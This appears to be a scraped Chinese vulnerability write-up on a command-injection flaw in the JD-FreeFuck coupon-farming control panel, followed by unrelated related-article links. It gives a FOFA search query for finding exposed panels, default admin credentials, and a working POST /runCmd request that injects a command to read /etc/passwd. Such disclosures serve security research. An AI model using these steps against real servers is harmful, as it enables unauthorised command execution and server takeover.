JD-FreeFuck 京东薅羊毛控制面板 后台命令执行漏洞
漏洞描述
i ⭐
JD-FreeFuck 存在后台命令执行漏洞,由于传参执行命令时没有对内容过滤,导致可以执行任意命令,控制服务器 项目地址: https://github.com/meselson/JD-FreeFuck
漏洞影响
s ✅
JD-FreeFuck
空间测绘
d ⭕
FOFA:title="京东薅羊毛控制面板"
漏洞复现
- 访问后登录页面如下
- ✅ 默认账号
useradmin/supermanito
POST /runCmd HTTP/1.1cmd=bash+jd.sh+%3Bcat /etc/passwd%3B+now&delay=500
个人博客
孤桜懶契:https://gylq.gitee.io/time
JD-FreeFuck 京东薅羊毛控制面板 后台命令执行漏洞相关推荐
- XXL-JOB 任务调度中心 后台任意命令执行漏洞
XXL-JOB 任务调度中心 0x01 漏洞描述 0x02 漏洞指纹 0x03 漏洞复现 0x04 漏洞示例 0x01 漏洞描述 在日常开发中,经常会用定时任务执行某些不紧急又非常重要的事情,例如批量 ...
- 群晖NAS教程(十九)、利用Docker安装青龙面板(京东薅羊毛)
为了更好的浏览体验,欢迎光顾勤奋的凯尔森同学个人博客 群晖NAS教程(十九).利用Docker安装青龙面板(京东薅羊毛) 一.安装qinglong容器 在群晖docker套件中,搜索qinglong, ...
- phpwind index.php?m=designc=api,phpwind v9存在命令执行漏洞(登陆后台)
已知漏洞:https://www.seebug.org/vuldb/ssvid-94465 phpwind v9最新版存在命令执行漏洞(登陆后台) Phpwind_v9.0.2(最新版),phpwin ...
- Hue 后台编辑器 远程命令执行漏洞
Hue 后台编辑器 远程命令执行漏洞 此文章仅供用于学习研究,严禁用于非法用途,否则后果自负. 漏洞简介 Hue 后台编辑器存在命令执行漏洞,攻击者通过编辑上传 xxx.sh 文件即可达到命令执行的目 ...
- 齐治堡垒机后台存在命令执行漏洞(CNVD-2019-17294)分析
基本信息 引用:https://www.cnvd.org.cn/flaw/show/CNVD-2019-17294 补丁信息:该漏洞的修复补丁已于2019年6月25日发布.如果客户尚未修复该补丁,可联 ...
- Nexus Repository Manager 3 远程命令执行漏洞 CVE-2019-7238
目录 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 漏洞复现 端口设置 Vulnhub官方复现教程 https://vulhub.org/#/environments/nexus/CVE- ...
- webmin远程命令执行漏洞(cve-2019-15107)深入分析
漏洞描述 近日Webmin被发现存在一处远程命令执行漏洞,经过分析后,初步猜测其为一次后门植入事件. Webmin是目前功能最强大的基于Web的Unix系统管理工具.管理员通过浏览器访问Webmin的 ...
- 【安全漏洞】Rocket.Chat 远程命令执行漏洞分析
简述 Rocket.Chat 是一个开源的完全可定制的通信平台,由 Javascript 开发,适用于具有高标准数据保护的组织. 2021年3月19日,该漏洞在 HackerOne 被提出,于2021 ...
- weblogic发序列化命令执行漏洞工具分享
weblogic发序列化命令执行漏洞工具分享(链接: https://pan.baidu.com/s/1qE5MFJ32672l-MMl-QL-wQ 密码: d85j) JBOSS_EXP 工具分享( ...
最新文章
- 第十届蓝桥杯java B组—试题I 后缀表达式
- 全球及中国成人病袍行业专项调研评估及未来发展趋势预测报告2021-2027年版
- 七十八、SpringBoot监听rabbitmq和创建交换器,队列
- CSS的计数器:counter-increment与counter-reset
- [转]Android应用的自动更新
- StringBuffer练习
- 【微型计算机原理与接口技术】寻址方式
- Linux centos7安装RabbitMQ3.8.9
- 如何在Java中将集合转换为列表
- 下载频道12月热门资源TOP100强力推荐!
- hadoop源码学习(-)
- 计蒜客 蓝桥杯模拟五 合并数字
- iOS 禁用休闲时钟锁屏
- 中南大学计算机学院楠,中南比湖大更湖大,不对,应该说湖大没中南大学中南。...
- mysql 查连接数,查看MySQL的连接数
- 40岁后学习编程是否太晚了?7点技巧让学习变得轻松有趣
- 2018 秋招 百度二轮面试---血淋淋的经历写实
- 嵌入式系统框架----硬件篇
- Cesium渐变色3dtiles白模(视频)
- WebGoat v8.1.0 下载安装(windows)
热门文章
- CSS 背景(background)
- 【信号处理】基于优化算法的 SAR 信号处理(Matlab代码实现)
- Heavy Transportation重型运输(Dijkstra算法 - 详解)
- 立秋后6大脏器排毒法 干净才是真正文艺范儿(转)
- 化工人员定位系统提供智能安全保障
- maven settings.xml 配置
- Autoencoder-based Zeroth Order Optimization Method for Attacking Black-box Neural Networks
- Sa-Token的Token有效期和临时有效期的区别
- JCR分区(WOS或Thomson Reuters或汤姆森 路透)和中科院分区(附网址及查询方法)...
- 通过chrome来找到淘票票猫眼电影京东淘宝api接口